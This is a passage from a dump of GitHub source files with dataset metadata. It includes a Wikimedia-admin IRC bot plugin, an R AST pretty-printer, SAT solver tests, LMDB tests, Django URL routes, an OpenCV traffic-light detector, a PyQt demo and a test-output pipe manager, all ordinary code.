I'm sorry.\"\n )\n\n\n@plugin.command(\"geo\")\ndef geo(bot, trigger):\n # !geo \n target = trigger.group(3)\n bot.say(\"Geolocate IP: https://whatismyipaddress.com/ip/1.1.1.1\" + target)\n\n\n@plugin.command(\"google\")\ndef google(bot, trigger):\n # !google \n target = trigger.group(2)\n bot.say(\n \"Google results: https://www.google.com/search?q=\" + target.replace(\" \", \"_\")\n )\n\n\n@plugin.command(\"guc\")\ndef guc(bot, trigger):\n # !guc \n target = trigger.group(2)\n bot.say(\n \"Global contribs, last hour: https://tools.wmflabs.org/guc/?src=hr&by=date&user=\"\n + target\n )\n\n\n@plugin.command(\"gucall\")\ndef gucall(bot, trigger):\n # !gucall \n target = trigger.group(2)\n bot.say(\"Global contribs, all: https://tools.wmflabs.org/guc/?user=\" + target)\n\n\n@plugin.command(\"ipqs\")\ndef ipqs(bot, trigger):\n # !ipqs \n target = trigger.group(3)\n bot.say(\n \"IP Quality Score: https://www.ipqualityscore.com/free-ip-lookup-proxy-vpn-test/lookup/\"\n + target\n )\n\n\n@plugin.command(\"proxy\")\ndef proxy(bot, trigger):\n # !proxy \n target = trigger.group(3)\n bot.say(\"Proxy API Checker: https://ipcheck.toolforge.org/index.php?ip=\" + target)\n\n\n@plugin.command(\"rbf\")\ndef rbf(bot, trigger):\n # !rbf \n target = trigger.group(3)\n bot.say(\n \"Range block finder: https://rangeblockfinder.toolforge.org/?excludelow&ip=\"\n + target\n )\n\n\n@plugin.command(\"stalk\")\ndef stalk(bot, trigger):\n # !stalk \n target = trigger.group(2)\n bot.say(\"Stalktoy: https://meta.toolforge.org/stalktoy/\" + target.replace(\" \", \"_\"))\n\n\n@plugin.command(\"stewardry\")\ndef stewardry(bot, trigger):\n # !stewardry \n target = trigger.group(3)\n bot.say(\n \"Stewardry (sysop): https://meta.toolforge.org/stewardry/\"\n + target.replace(\" \", \"_\")\n )\n\n\n@plugin.command(\"urban\")\ndef urban(bot, trigger):\n # !urban \n target = trigger.group(2)\n bot.say(\n \"Urban Dictionary lookup: https://www.urbandictionary.com/define.php?term=\"\n + target.replace(\" \", \"_\")\n )\n\n\n@plugin.command(\"whois\")\ndef whois(bot, trigger):\n # !whois \n target = trigger.group(3)\n bot.say(\n \"WHOIS lookup: https://whois-referral.toolforge.org/gateway.py?lookup=true&ip=\"\n + target\n )\n\n\n@plugin.command(\"xact\")\ndef xact(bot, trigger):\n # !xact \n target = trigger.group(2)\n bot.say(\n \"CrossActivity: https://meta2.toolforge.org/crossactivity/\"\n + target.replace(\" \", \"_\")\n )\n\n\n@plugin.require_owner(\n \"This command has been disabled, as the tool is currently offline.\"\n)\n@plugin.command(\"xcon\")\ndef xcon(bot, trigger):\n # !xcon \n target = trigger.group(2)\n bot.say(\n \"xContribs: https://erwin85.toolforge.org/xcontribs.php?user=\"\n + target.replace(\" \", \"_\")\n )\n\n\n@plugin.command(\"xguc\")\ndef xguc(bot, trigger):\n if trigger.group(2) != \"\":\n if re.search(r\"\\/\", trigger.group(3)):\n bot.say(\"https://xtools.wmflabs.org/globalcontribs/ipr-\" + trigger.group(3))\n else:\n bot.say(\"https://xtools.wmflabs.org/globalcontribs/\" + trigger.group(3))\n else:\n bot.say(\"What is the target? !xguc \")\n\n\n@plugin.command(\"xtools\")\ndef xtools(bot, trigger):\n # !xtools \n tricky_ones = [\n \"commons\",\n \"incubator\",\n \"mediawiki\",\n \"outreach\",\n \"sources\",\n \"species\",\n \"wikidata\",\n \"meta\",\n ]\n try:\n project, target = trigger.group(2).split(\" \", 1)\n except ValueError:\n bot.say(\"Something is missing... 
Syntax is !xtools \")\n return\n\n target = target.replace(\" \", \"_\")\n if project in tricky_ones:\n if project == \"commons\":\n bot.say(\n \"XTools: https://xtools.wmflabs.org/ec/commons.wikimedia.org/\" + target\n )\n elif project == \"incubator\":\n bot.say(\n \"XTools: https://xtools.wmflabs.org/ec/incubator.wikimedia.org/\"\n + target\n )\n elif project == \"mediawiki\":\n bot.say(\"XTools: https://xtools.wmflabs.org/ec/www.mediawiki.org/\" + target)\n elif project == \"outreach\":\n bot.say(\n \"XTools: https://xtools.wmflabs.org/ec/outreach.wikimedia.org/\" + target\n )\n elif project == \"sources\":\n bot.say(\n \"XTools: https://xtools.wmflabs.org/ec/www.wikisource.org/\" + target\n )\n elif project == \"species\":\n bot.say(\n \"XTools: https://xtools.wmflabs.org/ec/species.wikimedia.org/\" + target\n )\n elif project == \"wikidata\":\n bot.say(\"XTools: https://xtools.wmflabs.org/ec/www.wikidata.org/\" + target)\n elif project == \"meta\":\n bot.say(\n \"XTools: https://xtools.wmflabs.org/ec/meta.wikimedia.org/\" + target\n )\n else:\n try:\n lang, proj = re.split(\"w\", project)\n lang = lang.replace(\"_\", \"-\")\n except ValueError:\n lang = None\n\n target = target.replace(\" \", \"_\")\n\n if lang is not None:\n if proj == \"iki\":\n bot.say(\n \"XTools: https://xtools.wmflabs.org/ec/\"\n + lang\n + \".wikipedia.org/\"\n + target\n )\n else:\n bot.say(\n \"XTools: https://xtools.wmflabs.org/ec/\"\n + lang\n + \".w\"\n + proj\n + \".org/\"\n + target\n )\n\n else:\n bot.say(\n \"Hmm... I've tried and just can't figure out which project \"\n + project\n + \" is. I'm sorry.\"\n )\n","repo_name":"Operator873/SAM-retired","sub_path":"wikicmds.py","file_name":"wikicmds.py","file_ext":"py","file_size_in_byte":9236,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"72675283735","text":"\"\"\" Pretty-printer for the R AST.\n\nFor references on the R grammar, see ast.py.\n\nTODO:\n - Special functions: if, while, for, etc\n - Function definition: function(x) x+1\n\"\"\"\nfrom __future__ import absolute_import\n\nimport math\nfrom io import BytesIO as StringIO\nfrom textwrap import TextWrapper\n\nfrom nemesis.r import ast\n\n\n# Public API\n\ndef write_ast(node, out, indent=0):\n \"\"\" Pretty-prints an R AST to a file-like object.\n \"\"\"\n out.write(indent * ' ')\n _write_ast(node, out, indent)\n\ndef print_ast(node, indent=0):\n \"\"\" Pretty-prints an R AST as a string.\n \"\"\"\n io = StringIO()\n write_ast(node, io, indent)\n return io.getvalue()\n\n\n# Private write functions\n\ndef _write_ast(node, out, indent):\n for klass in node.__class__.__mro__:\n writer = writers.get(klass)\n if writer:\n return writer(node, out, indent)\n raise TypeError('Unknown node type %s' % node.__class__.__name__)\n\ndef _write_constant(node, out, indent):\n value = node.value\n if isinstance(value, bool):\n out.write('TRUE' if value else 'FALSE')\n elif isinstance(value, float) and math.isinf(value):\n out.write('Inf' if value > 0 else '-Inf')\n elif isinstance(value, float) and math.isnan(value):\n # Follow Pandas in using NaN to represent missing data.\n out.write('NA')\n elif isinstance(value, complex):\n new_node = ast.Call(ast.Name('complex'),\n (ast.Name('real'), ast.Constant(value.real)),\n (ast.Name('imaginary'), ast.Constant(value.imag)))\n _write_ast(new_node, out, indent)\n elif isinstance(value, unicode):\n out.write(repr(value.encode('ascii')))\n else:\n out.write(repr(value))\n\ndef _write_name(node, out, indent):\n 
out.write(node.value)\n \ndef _write_call(node, out, indent):\n # Dispatch on the kind of call being made.\n if _is_call_index(node):\n _write_call_index(node, out, indent)\n elif _is_call_operator(node):\n _write_call_operator(node, out, indent)\n else:\n # If we get here, it's a standard function call.\n _write_call_standard(node, out, indent)\n\ndef _write_call_index(node, out, indent):\n if not len(node.args) == 2:\n raise ValueError('Malformed index node %r' % node)\n \n _write_ast(node.args[0], out, indent)\n out.write(node.fn.value)\n _write_ast(node.args[1], out, indent)\n out.write(']' if node.fn.value == '[' else ']]')\n\ndef _write_call_operator(node, out, indent):\n # Unary case.\n if len(node.args) == 1:\n _write_ast(node.fn, out, indent)\n _write_ast(node.args[0], out, indent)\n \n # Binary case.\n elif len(node.args) == 2:\n # First argument.\n first = node.args[0]\n parens = (_is_call_operator(first) and\n _operator_precedence(first) < _operator_precedence(node))\n out.write('(' if parens else '')\n _write_ast(first, out, indent)\n out.write(')' if parens else '')\n \n # Operator.\n out.write('' if _print_hint(node) == 'short' else ' ')\n _write_ast(node.fn, out, indent)\n out.write('' if _print_hint(node) == 'short' else ' ')\n \n # Second argument. The difference in inequality strictness is due to\n # R's left-to-right evaluation order for operators of equal precedence.\n second = node.args[1]\n parens = (_is_call_operator(second) and\n _operator_precedence(second) <= _operator_precedence(node))\n out.write('(' if parens else '')\n _write_ast(second, out, indent)\n out.write(')' if parens else '')\n \n\ndef _write_call_standard(node, out, indent):\n _write_ast(node.fn, out, indent)\n out.write('(')\n\n # We can't predict the length of a general expression.\n if isinstance(node.fn, ast.Name):\n indent += len(node.fn.value) + 1\n else:\n indent += 2\n\n for i, node_or_pair in enumerate(node.args):\n # Print the argument separator (if not on the first argument).\n if i > 0:\n if _print_hint(node) == 'long':\n out.write(',')\n _write_newline(out, indent)\n else:\n out.write(',' if _print_hint(node) == 'short' else ', ')\n \n # Print the argument itself.\n if isinstance(node_or_pair, tuple):\n _write_ast(node_or_pair[0], out, indent)\n out.write('=' if _print_hint(node) == 'short' else ' = ')\n _write_ast(node_or_pair[1], out, indent)\n else:\n _write_ast(node_or_pair, out, indent)\n\n out.write(')')\n\ndef _write_pair_list(node, out, indent):\n for i, name_or_pair in enumerate(node.value):\n if i > 0:\n out.write(', ')\n if isinstance(name_or_pair, tuple):\n _write_ast(name_or_pair[0], out, indent)\n out.write(' = ')\n _write_ast(name_or_pair[1], out, indent)\n else:\n _write_ast(name_or_pair, out, indent)\n\ndef _write_block(node, out, indent):\n for i, expr in enumerate(node.value):\n if i > 0:\n if _print_hint(node) == 'short':\n out.write('; ')\n elif _print_hint(node) == 'long':\n _write_newline(out, 0)\n _write_newline(out, indent)\n else:\n _write_newline(out, indent)\n _write_ast(expr, out, indent)\n\ndef _write_comment(node, out, indent):\n wrapper = TextWrapper(initial_indent = '# ',\n subsequent_indent = indent * ' ' + '# ',\n break_long_words = False)\n out.write(wrapper.fill(node.value))\n\ndef _write_raw(node, out, indent):\n out.write(node.value)\n\ndef _write_newline(out, indent):\n out.write('\\n')\n out.write(' ' * indent)\n\n\n# Additional private functions\n\ndef _is_call_index(node):\n return (isinstance(node, ast.Call) and \n isinstance(node.fn, 
ast.Name) and node.fn.value in ('[', '[['))\n\ndef _is_call_operator(node):\n if not (isinstance(node, ast.Call) and isinstance(node.fn, ast.Name)):\n return False\n sym = node.fn.value\n num_args = len(node.args)\n return ((sym, num_args) in OP_PRECEDENCE or\n (sym.startswith('%') and sym.endswith('%') and num_args == 2))\n\ndef _operator_precedence(node):\n assert _is_call_operator(node)\n default = OP_PRECEDENCE[('%%', 2)]\n return OP_PRECEDENCE.get((node.fn.value, len(node.args)), default) \n\ndef _print_hint(node):\n return node.metadata.get('print_hint', 'normal')\n\n\n# Globals and constants\n\nwriters = { ast.Constant: _write_constant,\n ast.Name: _write_name,\n ast.Call: _write_call,\n ast.PairList: _write_pair_list,\n ast.Block: _write_block,\n ast.Comment: _write_comment,\n ast.Raw: _write_raw }\n\n# Binary and unary operators with precedence\n# \n# Reference: \n# http://stat.ethz.ch/R-manual/R-patched/library/base/html/Syntax.html\nOP_PRECEDENCE = {\n ('^', 2) : 14,\n ('-', 1) : 13, ('+', 1) : 13,\n (':', 2) : 12,\n ('%%', 2) : 11, # Any special operator (including %% and %/%)\n ('*', 2) : 10, ('/', 2) : 10,\n ('+', 2) : 9, ('-', 2) : 9,\n ('<', 2) : 8, ('>', 2) : 8, ('<=', 2) : 8, ('>=', 2) : 8,\n ('==', 2) : 8, ('!=', 2) : 8,\n ('!', 1) : 7,\n ('&', 2) : 6, ('&&', 2) : 6,\n ('|', 2) : 5, ('||', 2) : 5,\n ('~', 2) : 4,\n ('->', 2) : 3, ('->>', 2) : 3,\n ('<-', 2) : 2, ('<<-', 2) : 2,\n ('=', 2) : 1,\n ('?', 1) : 0, ('?', 2) : 0,\n}","repo_name":"AvianaGlobal/nemesis-mbmi","sub_path":"main/nemesis/r/pretty_print.py","file_name":"pretty_print.py","file_ext":"py","file_size_in_byte":7519,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"3173214607","text":"from tomriddle import cnf\nfrom time import time\nfrom sympy import symbols\nimport sympy.logic.boolalg as form\nfrom operator import invert\nfrom itertools import combinations\n\nfrom pycosat import itersolve\n\nfrom tomriddle import satbridge\n\n\ndef test_max_n_true():\n\n symbs = symbols(\"a,b,c,d,e\")\n mapper = satbridge.SymbolMapper(symbs)\n\n sat_in = cnf.max_n_true(symbs, 3, mapper=mapper)\n print(sat_in)\n ways = list(itersolve(sat_in))\n\n # none with more than three true\n for way in ways:\n assert len(way) == len(symbs)\n true_symbs = list(filter(lambda x: x > 0, way))\n assert 3 >= len(true_symbs)\n print(true_symbs)\n\n # one for each subset of size 0, 1, 2, or 3\n expect_num = (\n len(list(combinations(symbs, 3)))\n + len(list(combinations(symbs, 2)))\n + len(list(combinations(symbs, 1)))\n + 1 # the empty solution\n )\n assert expect_num == len(ways)\n\n\ndef test_min_n_true():\n\n symbs = symbols(\"a,b,c,d,e\")\n mapper = satbridge.SymbolMapper(symbs)\n\n sat_in = cnf.min_n_true(symbs, 3, mapper=mapper)\n print(sat_in)\n ways = list(itersolve(sat_in))\n\n # none with more than three true\n for way in ways:\n assert len(way) == len(symbs)\n true_symbs = list(filter(lambda x: x > 0, way))\n assert 3 <= len(true_symbs)\n print(true_symbs)\n\n # one for each subset of size 0, 1, 2, or 3\n expect_num = (\n len(list(combinations(symbs, 3)))\n + len(list(combinations(symbs, 4)))\n + 1 # the full solution\n )\n assert expect_num == len(ways)\n\n\ndef test_exactly_n_true():\n\n symbs = symbols(\"a,b,c,d,e\")\n mapper = satbridge.SymbolMapper(symbs)\n\n min_constraint = cnf.min_n_true(symbs, 2, mapper=mapper)\n max_constraint = cnf.max_n_true(symbs, 2, mapper=mapper)\n\n solutions = list(itersolve(min_constraint + max_constraint))\n\n assert 
len(list(combinations(symbs, 2))) == len(solutions)\n\n for sol in solutions:\n true_only = list(filter(lambda x: x > 0, sol))\n assert 2 == len(true_only)\n\n\ndef test_next_set():\n\n # {5, 1, 8} is the largest set after deduplication, so it will be chosen from\n begin = [[1, 2, 1], [3, 4], [5, 1, 8]]\n expect = (frozenset({1, 5, 8}), set([frozenset({1, 2}), frozenset({3, 4})]))\n result = cnf._next_set(begin)\n\n assert expect == result\n\n\ndef test_next_set_setinput():\n\n begin = {frozenset([1, 2, 1]), frozenset([3, 4]), frozenset([5, 1, 8])}\n expect = (frozenset({1, 5, 8}), set([frozenset({1, 2}), frozenset({3, 4})]))\n result = cnf._next_set(begin)\n\n assert expect == result\n\n\ndef test_setproduct():\n\n clauses = set(list(cnf._setproduct([[1, 2], [3, 4]])))\n\n assert clauses == {\n frozenset([1, 3]),\n frozenset([1, 4]),\n frozenset([2, 3]),\n frozenset([2, 4]),\n }\n\n\ndef test_setproduct_moar():\n\n terms = [[1, 2], [2, 3, 4], [5]]\n sp = set(list(cnf._setproduct(terms)))\n\n assert sp == {\n frozenset([1, 2, 5]),\n frozenset([1, 3, 5]),\n frozenset([1, 4, 5]),\n frozenset([2, 5]),\n frozenset([2, 3, 5]),\n frozenset([2, 4, 5]),\n }\n\n\ndef dnf_equivalence(expr, symbs):\n\n mapper = satbridge.SymbolMapper(symbs)\n\n # convert with sympy\n def control(expr):\n cnf_expr = form.to_cnf(expr, simplify=True, force=True)\n sat_in = satbridge.expr_to_satfmt(cnf_expr, mapper)\n return sat_in\n\n # convert with something I made up\n def experiment(expr):\n return cnf.from_dnf(expr, mapper)\n\n def get_solns(func):\n\n # make expression\n before = time()\n cnf_clauses = func(expr)\n\n # find solutions\n solutions = []\n for sat_out in itersolve(cnf_clauses):\n true_only = list(filter(lambda x: x > 0, sat_out))\n if true_only:\n expr_out = cnf.AND(list(map(mapper.to_symb, true_only)))\n solutions.append(expr_out)\n\n after = time()\n return solutions, after - before\n\n # do they yield the same solutions?\n experiment_solns, experiment_duration = get_solns(experiment)\n control_solns, control_duration = get_solns(control)\n\n print(\"control\", control_duration, \"seconds\")\n print(\"experiment\", experiment_duration, \"seconds\")\n\n # this an obnoxious way to assert equality,\n # but expressions aren't hashable and order doesn't matter\n\n for c in control_solns:\n assert c in experiment_solns\n\n for e in experiment_solns:\n assert e in control_solns\n\n\ndef test_dnf_a():\n\n # which ways for every other one to be true\n symbs = symbols(\"a,b,c,d,e,f\")\n a, b, c, d, e, f = symbs\n expr = (a & c & e) | (b & d & f)\n dnf_equivalence(expr, symbs)\n\n\ndef test_dnf_b():\n\n # how many ways for 3 of these to be true?\n symbs = symbols(\"a,b,c,d,e,f\")\n microstates = []\n for microstate in combinations(symbs, 2):\n microstates.append(cnf.AND(microstate))\n expr = cnf.OR(microstates)\n\n dnf_equivalence(expr, symbs)\n\n\ndef test_dnf_c():\n\n # how many ways for 3 of these to be true?\n symbs = symbols(\"a,b,c,d,e,f,g\")\n a, b, c, d, e, f, g = symbs\n expr = a | (b & ~c) | (a & c) | (d & ~e & ~f & g) | ~g\n\n dnf_equivalence(expr, symbs)\n\n\ndef test_bcd():\n\n # how many ways for 3 consecurive of these to be true?\n symbs = symbols(\"a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t\")\n mapper = satbridge.SymbolMapper(symbs)\n a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r, s, t = symbs\n\n straight_expr = (a & b & c) | (b & c & d) | (c & d & e) | (d & e & f) | (g & h & i)\n straight = cnf.from_dnf(straight_expr, mapper=mapper)\n\n max3 = cnf.max_n_true(symbs, 3, mapper=mapper)\n\n 
sat_in = straight + max3\n solutions = list(itersolve(sat_in))\n\n nofalse = sorted([list(filter(lambda x: x > 0, y)) for y in solutions])\n assert 5 == len(nofalse)\n print(nofalse)\n","repo_name":"MatrixManAtYrService/tomriddle","sub_path":"tests/test_cnf.py","file_name":"test_cnf.py","file_ext":"py","file_size_in_byte":5884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"15295589192","text":"#!/usr/bin/python2\n\"\"\"\nLMDB test 3.\nTwo processes accessing shared memory.\n\"\"\"\nimport argparse\nimport lmdb\nimport logging\nimport psutil\nimport random\nimport string\nimport uuid\n\nlogger = logging.getLogger(__name__)\n\n\nDATAPATH = 'test_data'\nNUM_OF_WRITES = 100\n\n\ndef commandLineArgs():\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\"-r\", \"--reader\", action=\"store_true\", help=\"Run as the reader process.\")\n group.add_argument(\"-w\", \"--writer\", action=\"store_true\", help=\"Run as the writer process.\")\n return parser.parse_args()\n\n\ndef hit_enter():\n try:\n dummy = input('-- hit Enter to continue --')\n except:\n pass #ignore all.\n\n\ndef random_string(string_length=128):\n \"\"\"\n \"\"\"\n characters = string.ascii_letters + string.digits\n return ''.join(random.choice(characters) for i in range(string_length))\n\n\ndef the_writer():\n \"\"\"\n \"\"\"\n logger.debug('lmdb begin Write test.')\n logger.debug('random_string: %s', random_string())\n # map_size=10485760\n # writemap=True\n env_write = lmdb.open(DATAPATH, readonly=False, max_dbs=2)\n with env_write.begin(write=True, buffers=True) as txn:\n txn.put('somename', 'somedata')\n txn.put('mykey', 'myvalue')\n\n for index in range(NUM_OF_WRITES):\n txn.put(str(uuid.uuid4()), random_string())\n #\n logger.info('memory:\\n%s', psutil.virtual_memory())\n hit_enter()\n\n\ndef the_reader():\n \"\"\"\n \"\"\"\n logger.debug('lmdb begin Get test.')\n env_read = lmdb.open(DATAPATH, readonly=True)\n with env_read.begin(write=False, buffers=True) as txn:\n key = 'somename'\n logger.info('key=%s, value=%s', key, txn.get(key))\n key = 'nada'\n logger.info('key=%s, value=%s', key, txn.get(key))\n\n logger.debug('lmdb begin Cursor test.')\n env_read = lmdb.open(DATAPATH, readonly=True)\n with env_read.begin(write=False, buffers=True) as txn:\n cursor = txn.cursor()\n counter = 0\n for key, value in cursor:\n logger.debug('key=%s, value=%s', key, value)\n counter += 1\n #\n logger.info('%d values.', counter)\n logger.info('memory:\\n%s', psutil.virtual_memory())\n hit_enter()\n\n\ndef main(args):\n \"\"\"\n \"\"\"\n logger.info('lmdb test3.')\n logger.info('lmdb version %s', lmdb.version())\n\n if args.writer:\n the_writer()\n\n if args.reader:\n the_reader()\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n args = commandLineArgs()\n main(args)\n","repo_name":"warren-taylor-2hat/lmdb-playground","sub_path":"lmdb_test4.py","file_name":"lmdb_test4.py","file_ext":"py","file_size_in_byte":2592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72569252698","text":"from django.conf.urls import url\n\nfrom rbac.views import role\nfrom rbac.views import menu\n\nurlpatterns = [\n # 角色列表\n url(r'^role/list/$', role.role_list, name='role_list'),\n # 角色添加\n url(r'^role/add/$', role.role_add, name='role_add'),\n # 角色修改\n url(r'^role/edit/(?P\\d+)/$', role.role_edit, name='role_edit'),\n # 角色删除\n url(r'^role/del/(?P\\d+)/$', 
role.role_del, name='role_del'),\n\n # 菜单列表\n url(r'^menu/list/$', menu.menu_list, name='menu_list'),\n # 添加菜单\n url(r'^menu/add/$', menu.menu_add, name='menu_add'),\n # 修改菜单\n url(r'^menu/edit/(?P\\d+)/$', menu.menu_edit, name='menu_edit'),\n # 删除菜单\n url(r'^menu/del/(?P\\d+)/$', menu.menu_del, name='menu_del'),\n\n]","repo_name":"limou09/crm-django","sub_path":"rbac/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18313782635","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 15 13:47:52 2020\n\n@author: broch\n\"\"\"\nimport datetime\nimport time\n\nfrom tqdm import trange\n\n\ndef calc_days_until_today(date):\n \"\"\"datetime(year, month, day, hour, minute, second)\n example date=datetime.datetime(2020, 9, 13, 8, 21, 10)\n \"\"\"\n today = datetime.datetime.today().replace(tzinfo=date.tzinfo)\n interval = today - date # returns a timedelta object\n return interval.days\n\n\ndef wait_secs(secs: int, show_progress_bar: bool = True):\n if not show_progress_bar:\n time.sleep(secs)\n return\n\n for i in trange(secs):\n time.sleep(1)\n","repo_name":"brochj/bothunter","sub_path":"src/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"43552094441","text":"#!/usr/bin/python\n\nimport cv2\nimport urllib\nimport numpy as np\n \nstream=urllib.urlopen('http://192.168.1.49:8080/?action=stream')\nbytes=''\nwhile True:\n bytes+=stream.read(1024)\n a = bytes.find('\\xff\\xd8')\n b = bytes.find('\\xff\\xd9')\n if a!=-1 and b!=-1:\n jpg = bytes[a:b+2]\n bytes= bytes[b+2:]\n i = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8),cv2.CV_LOAD_IMAGE_COLOR)\n cv2.imshow('i',i)\n if cv2.waitKey(1) == 27:\n exit(0)\n","repo_name":"gchinellato/Self-Balance-Robot","sub_path":"nfs-server/modules/ComputerVison/Test/stream.py","file_name":"stream.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"68"} +{"seq_id":"32791817314","text":"import os\nimport cv2\nimport numpy as np\nimport base64\nimport json\nfrom python.src.utils.classes.commons.serwo_objects import SerWOObject\ndef detect(img_from_request):\n # Important simplyfying assumption. 
Exactly one traffic light is in the view of the camera.\n font = cv2.FONT_HERSHEY_SIMPLEX\n img = img_from_request\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n # color range\n lower_red1 = np.array([0,100,100])\n upper_red1 = np.array([10,255,255])\n lower_red2 = np.array([160,100,100])\n upper_red2 = np.array([180,255,255])\n lower_green = np.array([40,50,50])\n upper_green = np.array([90,255,255])\n lower_yellow = np.array([15,150,150])\n upper_yellow = np.array([35,255,255])\n mask1 = cv2.inRange(hsv, lower_red1, upper_red1)\n mask2 = cv2.inRange(hsv, lower_red2, upper_red2)\n maskg = cv2.inRange(hsv, lower_green, upper_green)\n masky = cv2.inRange(hsv, lower_yellow, upper_yellow)\n maskr = cv2.add(mask1, mask2)\n # hough circle detect\n r_circles = cv2.HoughCircles(maskr, cv2.HOUGH_GRADIENT, 1, 80,\n param1=50, param2=10, minRadius=0, maxRadius=30)\n g_circles = cv2.HoughCircles(maskg, cv2.HOUGH_GRADIENT, 1, 60,\n param1=50, param2=10, minRadius=0, maxRadius=30)\n y_circles = cv2.HoughCircles(masky, cv2.HOUGH_GRADIENT, 1, 30,\n param1=50, param2=5, minRadius=0, maxRadius=30)\n # traffic light detect\n r = 5\n bound = 4.0 / 10\n if r_circles is not None:\n return \"red\"\n if g_circles is not None:\n return \"green\"\n if y_circles is not None:\n return \"yellow\"\n \ndef decode(image_json):\n decoded_image = base64.b64decode(image_json[\"image\"].encode('utf-8'))\n jpeg_as_np = np.frombuffer(decoded_image, dtype=np.uint8)\n image = cv2.imdecode(jpeg_as_np, flags=1)\n return image\n\n\ndef function(serwoObject) -> SerWOObject:\n try:\n image_json = json.loads(serwoObject.get_body())\n image = decode(image_json)\n traffic_color = detect(image)\n ret_val = {\"color\":traffic_color}\n return SerWOObject(body=ret_val)\n except Exception as e:\n return SerWOObject(error=True)","repo_name":"whiz-Tuhin/takeaways","sub_path":"lambda-ml-models/ServerlessInference/TrafficLight/ONNX-TrafficLightDetect/traffic_light_detector.py","file_name":"traffic_light_detector.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"3985266301","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QAction\n\nclass MenuBarDemo(QMainWindow):\n def __init__(self):\n super().__init__()\n self.setWindowTitle('Menubar Demo')\n self.resize(600,500)\n\n self.menuBar = self.menuBar()\n\n fileMenu = self.menuBar.addMenu('File')\n editMenu = self.menuBar.addMenu('Edit')\n undoDeleteMenu = editMenu.addMenu('Undo delete')\n\n exit_action = QAction('Exit App', self)\n exit_action.setShortcut('Ctrl+Q')\n exit_action.triggered.connect(lambda:QApplication.quit())\n\n fileMenu.addAction(exit_action)\n\n yes_action = QAction('Yes', self)\n no_action = QAction('No', self)\n undoDeleteMenu.addAction(yes_action)\n undoDeleteMenu.addAction(no_action)\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n\n demo = MenuBarDemo()\n demo.show()\n\n sys.exit(app.exec_())","repo_name":"joseespiritu/PyQt5","sub_path":"tutorial_pyqt5/MenuBarWidget/demo.pyw","file_name":"demo.pyw","file_ext":"pyw","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"41017361190","text":"import multiprocessing\nimport pdb\nimport os\nimport sys\nimport threading\nimport traceback\n\nimport log\n\npdb._Pdb = pdb.Pdb\nclass ForkedPdb(pdb._Pdb):\n '''\n A Pdb subclass that may be used from a forked multiprocessing child\n '''\n io_manager = None\n def 
interaction(self, *args, **kwargs):\n _stdin = sys.stdin\n self.io_manager.restore_pipes()\n try:\n sys.stdin = open('/dev/stdin')\n pdb._Pdb.interaction(self, *args, **kwargs)\n finally:\n sys.stdin = _stdin\n self.io_manager.replace_pipes()\n\n\nclass IoManager(object):\n def __init__(self, test, suite):\n self.test = test\n self.suite = suite\n self.log = log.test_log\n self._init_pipes()\n \n def _init_pipes(self):\n self.stdout_rp, self.stdout_wp = os.pipe()\n self.stderr_rp, self.stderr_wp = os.pipe()\n\n def close_parent_pipes(self):\n os.close(self.stdout_wp)\n os.close(self.stderr_wp)\n\n def setup(self):\n self.replace_pipes()\n self.fixup_pdb()\n \n def fixup_pdb(self):\n ForkedPdb.io_manager = self\n pdb.Pdb = ForkedPdb\n\n def replace_pipes(self):\n self.old_stderr = os.dup(sys.stderr.fileno())\n self.old_stdout = os.dup(sys.stdout.fileno())\n\n os.dup2(self.stderr_wp, sys.stderr.fileno())\n sys.stderr = os.fdopen(self.stderr_wp, 'w', 0)\n os.dup2(self.stdout_wp, sys.stdout.fileno())\n sys.stdout = os.fdopen(self.stdout_wp, 'w', 0)\n \n def restore_pipes(self):\n self.stderr_wp = os.dup(sys.stderr.fileno())\n self.stdout_wp = os.dup(sys.stdout.fileno())\n\n os.dup2(self.old_stderr, sys.stderr.fileno())\n sys.stderr = os.fdopen(self.old_stderr, 'w', 0)\n os.dup2(self.old_stdout, sys.stdout.fileno())\n sys.stdout = os.fdopen(self.old_stdout, 'w', 0)\n\n def start_loggers(self):\n self.log_ouput()\n\n def log_ouput(self):\n def _log_output(pipe, log_callback):\n with os.fdopen(pipe, 'r') as pipe:\n # Read iteractively, don't allow input to fill the pipe.\n for line in iter(pipe.readline, ''):\n log_callback(line)\n\n # Don't keep a backpointer to self in the thread. \n log = self.log\n test = self.test\n suite = self.suite\n\n self.stdout_thread = threading.Thread(\n target=_log_output,\n args=(self.stdout_rp, \n lambda buf: log.test_stdout(test, suite, buf))\n )\n self.stderr_thread = threading.Thread(\n target=_log_output,\n args=(self.stderr_rp, \n lambda buf: log.test_stderr(test, suite, buf))\n )\n\n # Daemon + Join to not lock up main thread if something breaks \n # but provide consistent execution if nothing goes wrong.\n self.stdout_thread.daemon = True\n self.stderr_thread.daemon = True\n self.stdout_thread.start()\n self.stderr_thread.start()\n \n def join_loggers(self):\n self.stdout_thread.join()\n self.stderr_thread.join()\n\n\nclass SubprocessException(Exception):\n def __init__(self, exception, 